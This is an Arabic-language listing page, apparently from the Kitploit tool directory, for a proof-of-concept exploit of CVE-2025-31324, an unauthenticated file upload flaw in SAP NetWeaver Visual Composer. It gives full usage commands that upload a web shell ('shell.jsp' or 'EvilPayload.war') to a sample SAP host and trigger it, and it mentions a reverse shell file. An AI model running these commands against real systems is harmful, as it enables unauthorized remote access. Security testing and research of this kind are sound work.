Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-31324_PoC — إثبات المفهوم لثغرة CVE-2025-31324: رفع ملفات بدون مصادقة في SAP NetWeaver Visual Composer Metadata Uploader | Kitploit
أدوات/GitHubGitHub/odst-forge/cve-2025-31324_poc
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubodst-forge/cve-2025-31324_poc

CVE-2025-31324_PoC

إثبات المفهوم لثغرة CVE-2025-31324: رفع ملفات بدون مصادقة في SAP NetWeaver Visual Composer Metadata Uploader

عرض المستودع
62منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-31324_PoC

إثبات المفهوم لـ CVE-2025-31324: رفع غير مصادق عليه في SAP NetWeaver Visual Composer Metadata Uploader

يقوم هذا السكربت بتنفيذ:

  1. رفع ملف إلى نقطة النهاية المعرضة للخطر (عبر Upload host/port)
  2. تشغيل اختياري عبر HTTP GET (عبر Trigger host/port)
  3. تحقق أساسي من الاستجابة/تسجيل الأحداث

مثال للاستخدام: python3 PoC.py
--host sap.example.com --port 50000
--endpoint /irj/portal/sap/bc/webdynpro/sap/ZWDC_METADATA_UPLDR
--file EvilPayload.war
--trigger-path /irj/portal/irj/servlet_jsp/irj/root/EvilPayload/shell.jsp
--trigger-host sap.example.com --trigger-port 50001 --trigger-https true
--bypass-portal

python3 PoC.py --host sap.example.com --port 50000
--endpoint /developmentserver/metadatauploader
--file shell.jsp
--trigger-path /visual_composer/shell.jsp
--trigger-host sap.example.com --trigger-port 50001 --trigger-https

لديك أيضًا إمكانية رفع ملف .war إذا كانت هذه هي الطريقة التي تريد التنفيذ بها. cache.jsp عبارة عن شل عكسي سيمنحك وصولًا بمجرد الدخول إلى النظام. (ما زلت أعمل على حل بعض المشكلات هناك)

إخلاء مسؤولية

هذا مخصص للأغراض التعليمية فقط ويجب عدم استخدامه لأي أنشطة ضارة. تأكد دائمًا من حصولك على الأذونات اللازمة واتبع الإرشادات الأخلاقية عند اختبار أو البحث في الثغرات الأمنية.

لأي أسئلة أو توضيحات، لا تتردد في التواصل. ابقَ آمنًا ومحميًا!

تنزيل الأداة